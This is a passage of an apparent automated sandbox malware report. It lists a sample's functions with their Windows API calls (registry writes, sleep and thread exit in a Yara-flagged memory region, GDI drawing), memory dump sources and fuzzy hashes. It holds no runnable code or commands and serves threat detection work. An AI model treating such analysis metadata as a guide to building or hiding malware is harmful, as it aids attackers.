                                    • Opcode Fuzzy Hash: ebfbaac0b6fab46e20a7014245e6efb63f14c29218179942c90a94eb66b89ba2
                                    • Instruction Fuzzy Hash: A0E0BFB2E44614CBCB248BA4E8457A9B7B0FB48725F400699DB1992280D7355951CB55
                                    Function 004AB9C5 Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 004ABAAC
                                      • Part of subcall function 004B1DB4: RtlInitializeCriticalSection.NTDLL(00000000), ref: 004B1DF1
                                      • Part of subcall function 004B1DB4: RtlEnterCriticalSection.NTDLL(?), ref: 004B1E0C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CriticalSection$AllocateEnterHeapInitialize
                                    • String ID:
                                    • API String ID: 1616793339-0
                                    • Opcode ID: b1dede2be62a4c489378df9b3a10dc5415157c9fe19706e0dd93d5a745115784
                                    • Instruction ID: 8ec9f527ebc461e76cc2ccd335f3ffd665a1fa9b85f978b4960b4916685a06de
                                    • Opcode Fuzzy Hash: b1dede2be62a4c489378df9b3a10dc5415157c9fe19706e0dd93d5a745115784
                                    • Instruction Fuzzy Hash: F121B831A00205AFDB10DFA9DC42BDE7764EB11724F14411BF411EB6D2D77CA94197E8
                                    Function 004BE412 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateWindowExA.USER32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004BE4B0
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: 797b1778c3459dfc6a2b4d29c90a2d1ea4a4c340ea5bdf0460bab65829f75aa3
                                    • Instruction ID: ef0075ef44dde289700079a5cd2cc4dd3f5a4943ad784640b19fef36598d3d0e
                                    • Opcode Fuzzy Hash: 797b1778c3459dfc6a2b4d29c90a2d1ea4a4c340ea5bdf0460bab65829f75aa3
                                    • Instruction Fuzzy Hash: 2A31AB79A00219AFCF41DFA9C8449DEBBF1BF4C300F00856AF908E7210E7359A519FA4
                                    Function 004C1F2C Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004C1F31
                                      • Part of subcall function 004C1C94: __EH_prolog.LIBCMT ref: 004C1C99
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: ccfe15d8706e6a888d6ce2a6a293767325390129f491631b2a4310bbea0a7046
                                    • Instruction ID: b8d8586ee599876245598e0afbbebd95e0b848bb9f298c291167beb15e2ee16a
                                    • Opcode Fuzzy Hash: ccfe15d8706e6a888d6ce2a6a293767325390129f491631b2a4310bbea0a7046
                                    • Instruction Fuzzy Hash: C111AF756007009BC760DF29C892EABB7F8FF56318B10456FE54697662DB78E900CB68
                                    Function 0242F9B9 Relevance: 1.5, APIs: 1, Instructions: 33registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 0242FA60
                                    • RegSetValueExA.KERNEL32(00000000,00000000,00000000,00000004,00000000,00000004), ref: 0242FB14
                                    • wsprintfA.USER32 ref: 0242FBC9
                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004), ref: 0242FC06
                                    • RegCloseKey.KERNEL32(00000000), ref: 0242FCD5
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Valuewsprintf$CloseQuery
                                    • String ID:
                                    • API String ID: 1706290719-0
                                    • Opcode ID: 2ecc1b79f795a8aea3a0aa05e57f3edeab260d0d6f54c714d9fd68c7fad3251b
                                    • Instruction ID: 85f721448b23d604841ce4633397b934c2596c5bbb41b6bd2421e5b37f02637b
                                    • Opcode Fuzzy Hash: 2ecc1b79f795a8aea3a0aa05e57f3edeab260d0d6f54c714d9fd68c7fad3251b
                                    • Instruction Fuzzy Hash: F1014B30A01129DBCB24CB85E9987AAB3B1BF48315F9241DAC40AA7650C7308EC8CF04
                                    Function 004C1C94 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: 4d85543fd17436e58ba078bad8b943e5fa0d03786c3e1af69959623a4667f77e
                                    • Instruction ID: ba9893cc8f100ad0b3a39a6083e079394941f54348bd908eadaa26412fa7e4d1
                                    • Opcode Fuzzy Hash: 4d85543fd17436e58ba078bad8b943e5fa0d03786c3e1af69959623a4667f77e
                                    • Instruction Fuzzy Hash: 68E09A75D41209DFCB41EFA8D545AAEBBF4FB49718F20857FE405E2601E3358A028BA5
                                    Function 0063EBC1 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                    Download Yara Rule
                                    APIs
                                    • KiUserExceptionDispatcher.NTDLL(?,0063EB69), ref: 0063EBC7
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: DispatcherExceptionUser
                                    • String ID:
                                    • API String ID: 6842923-0
                                    • Opcode ID: b28eeaae62f6e23880d25c289dfa0cc529f8748fb4b8a3ea378fa927efa10cda
                                    • Instruction ID: 9f0b38d92756a723ceb96169532b773624dd3ef574d47a4c55ad65be51934596
                                    • Opcode Fuzzy Hash: b28eeaae62f6e23880d25c289dfa0cc529f8748fb4b8a3ea378fa927efa10cda
                                    • Instruction Fuzzy Hash: A1D0A9B42006448FEF508F388908478BAE6EF89320B1145BCE8CBEB3A0E7349D40DB01
                                    Function 004C1D9D Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadStringA.USER32(?,?,?,?), ref: 004C1DB4
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: LoadString
                                    • String ID:
                                    • API String ID: 2948472770-0
                                    • Opcode ID: 3d3a2606062da20ca26e329862b022a914add25c0874867cd9b3240979695922
                                    • Instruction ID: 69b6ef5263b44f2a49d8b4a1a3e0c3466d80d96a7be98c8a95d7782beda83867
                                    • Opcode Fuzzy Hash: 3d3a2606062da20ca26e329862b022a914add25c0874867cd9b3240979695922
                                    • Instruction Fuzzy Hash: C5D0A77A5083A19BC751DF618C04D4FBBE8BF55320B044C1EF48443112C324E444C766
                                    Function 004C088A Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShowWindow.USER32(?,?,004164AE,?), ref: 004C0898
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ShowWindow
                                    • String ID:
                                    • API String ID: 1268545403-0
                                    • Opcode ID: 3b93d8d6697863ec1dce2086ca437407c7758a23342a8b6f57955f818e4957d7
                                    • Instruction ID: 5742d00c068640fda4af83234dbef36747e4fda6c0005153530314142d3b2437
                                    • Opcode Fuzzy Hash: 3b93d8d6697863ec1dce2086ca437407c7758a23342a8b6f57955f818e4957d7
                                    • Instruction Fuzzy Hash: 42D09234604200EFCB899F60C948F1ABBA2BF94704F648979E1868A525D736DC52EB69
                                    Function 024240AD Relevance: 1.3, APIs: 1, Instructions: 44sleepthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(010B0023), ref: 024242A0
                                    • Sleep.KERNEL32(001B7740), ref: 024242AD
                                    • RtlExitUserThread.NTDLL(00000000), ref: 024242BA
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$ExitThreadUser
                                    • String ID:
                                    • API String ID: 3121592155-0
                                    • Opcode ID: aebd96fae0ea5bff74e03338655fd7eca7ca0477b1efdf6a1a85707232232603
                                    • Instruction ID: 728b24811fcf364388cfefe413d62b5502edce6332bba2d7936b1bbb472cb137
                                    • Opcode Fuzzy Hash: aebd96fae0ea5bff74e03338655fd7eca7ca0477b1efdf6a1a85707232232603
                                    • Instruction Fuzzy Hash: 351161B0E002358BEB65CB02CE447AA7771FB90305F5485FAC6097B644EB354ACACF18

                                    Non-executed Functions

                                    Function 00442520 Relevance: 85.5, APIs: 47, Strings: 1, Instructions: 1494windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004C2FE4: __EH_prolog.LIBCMT ref: 004C2FE9
                                      • Part of subcall function 004C2FE4: BeginPaint.USER32(?,?,?,?,00417549), ref: 004C3012
                                      • Part of subcall function 004C2B95: GetClipBox.GDI32(?,?), ref: 004C2B9C
                                    • DPtoLP.GDI32 ref: 0044263B
                                    • GetClientRect.USER32(?,?), ref: 00442649
                                    • DPtoLP.GDI32(?,?,00000002), ref: 00442661
                                    • IntersectRect.USER32(?,?,?), ref: 00442700
                                    • LPtoDP.GDI32(?,?,00000002), ref: 00442741
                                    • IntersectRect.USER32(?,?,?), ref: 0044279E
                                    • LPtoDP.GDI32(?,?,00000002), ref: 004427DF
                                    • CreateRectRgnIndirect.GDI32(?), ref: 0044280A
                                    • IntersectRect.USER32(?,?,?), ref: 0044283E
                                    • LPtoDP.GDI32(?,?,00000002), ref: 0044287F
                                    • CreateRectRgnIndirect.GDI32(?), ref: 004428A5
                                    • CreateRectRgnIndirect.GDI32(?), ref: 004428D4
                                    • GetCurrentObject.GDI32(?,00000006), ref: 004428F0
                                    • GetCurrentObject.GDI32(?,00000001), ref: 00442909
                                    • GetCurrentObject.GDI32(?,00000002), ref: 00442922
                                      • Part of subcall function 004C2854: SetBkMode.GDI32(?,?), ref: 004C286D
                                      • Part of subcall function 004C2854: SetBkMode.GDI32(?,?), ref: 004C287B
                                      • Part of subcall function 004BF646: GetScrollPos.USER32(00000000,00425D93), ref: 004BF664
                                      • Part of subcall function 00442150: CreateFontIndirectA.GDI32(00000000), ref: 004421A2
                                    • FillRgn.GDI32(?,?,?), ref: 00442B02
                                    • IntersectRect.USER32(?,?,?), ref: 00442BE7
                                    • IsRectEmpty.USER32(?), ref: 00442BF2
                                    • LPtoDP.GDI32(?,?,00000002), ref: 00442C0F
                                    • CreateRectRgnIndirect.GDI32(?), ref: 00442C1A
                                    • CombineRgn.GDI32(?,?,?,00000004), ref: 00442C4B
                                    • DPtoLP.GDI32(?,?,00000002), ref: 00442C69
                                      • Part of subcall function 004C293B: SetMapMode.GDI32(?,?), ref: 004C2954
                                      • Part of subcall function 004C293B: SetMapMode.GDI32(?,?), ref: 004C2962
                                    • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00442CA8
                                    • IntersectRect.USER32(?,?,?), ref: 00442D3B
                                    • IsRectEmpty.USER32(?), ref: 00442D81
                                    • SelectObject.GDI32(?,?), ref: 00442DBC
                                    • DPtoLP.GDI32(?,?,00000001), ref: 00442E48
                                    • LPtoDP.GDI32(?,?,00000001), ref: 00442F67
                                    • DPtoLP.GDI32(?,?,00000001), ref: 00442F85
                                      • Part of subcall function 004C2C69: MoveToEx.GDI32(?,?,?,?), ref: 004C2C8B
                                      • Part of subcall function 004C2C69: MoveToEx.GDI32(?,?,?,?), ref: 004C2C9F
                                      • Part of subcall function 004C2CB5: MoveToEx.GDI32(?,?,?,00000000), ref: 004C2CCF
                                      • Part of subcall function 004C2CB5: LineTo.GDI32(?,?,?), ref: 004C2CE0
                                      • Part of subcall function 004C2778: SelectObject.GDI32(?,00000000), ref: 004C279A
                                      • Part of subcall function 004C2778: SelectObject.GDI32(?,?), ref: 004C27B0
                                      • Part of subcall function 00445810: GetCurrentObject.GDI32(?), ref: 004458DB
                                      • Part of subcall function 00445810: LPtoDP.GDI32(?,00000000,00000001), ref: 00445928
                                    • IntersectRect.USER32(?,00000000,?), ref: 004430D2
                                    • IsRectEmpty.USER32(00000000), ref: 004430DD
                                    • PatBlt.GDI32(?,00000000,?,?,?,00F00021), ref: 00443124
                                    • LPtoDP.GDI32(?,00000000,00000002), ref: 00443139
                                    • CreateRectRgnIndirect.GDI32(00000000), ref: 00443144
                                    • CombineRgn.GDI32(?,?,?,00000004), ref: 00443175
                                    • LPtoDP.GDI32(?,?,00000001), ref: 004431A4
                                    • DPtoLP.GDI32(?,?,00000001), ref: 004431C2
                                    • wsprintfA.USER32 ref: 00443260
                                    • SelectObject.GDI32(?,?), ref: 00443288
                                    • IntersectRect.USER32(?,?,?), ref: 004437F8
                                    • IsRectEmpty.USER32(?), ref: 00443803
                                    • LPtoDP.GDI32(?,?,00000002), ref: 00443820
                                    • CreateRectRgnIndirect.GDI32(?), ref: 0044382B
                                    • CombineRgn.GDI32(?,?,?,00000004), ref: 0044385C
                                    • GetSysColor.USER32(0000000F), ref: 004429E6
                                      • Part of subcall function 004C31E1: __EH_prolog.LIBCMT ref: 004C31E6
                                      • Part of subcall function 004C31E1: CreateSolidBrush.GDI32(?), ref: 004C3203
                                      • Part of subcall function 004C3191: __EH_prolog.LIBCMT ref: 004C3196
                                      • Part of subcall function 004C3191: CreatePen.GDI32(?,?,?), ref: 004C31B9
                                    • CreateRectRgnIndirect.GDI32(?), ref: 00442766
                                      • Part of subcall function 00443D20: CopyRect.USER32(?,00000000), ref: 00443D97
                                      • Part of subcall function 00443D20: IsRectEmpty.USER32(?), ref: 00443DA2
                                      • Part of subcall function 00443D20: GetClientRect.USER32(00000000,?), ref: 00443DE1
                                      • Part of subcall function 00443D20: DPtoLP.GDI32(?,?,00000002), ref: 00443DF3
                                      • Part of subcall function 00443D20: LPtoDP.GDI32(?,?,00000002), ref: 00443E30
                                    • FillRect.USER32(?,?,?), ref: 00443B59
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
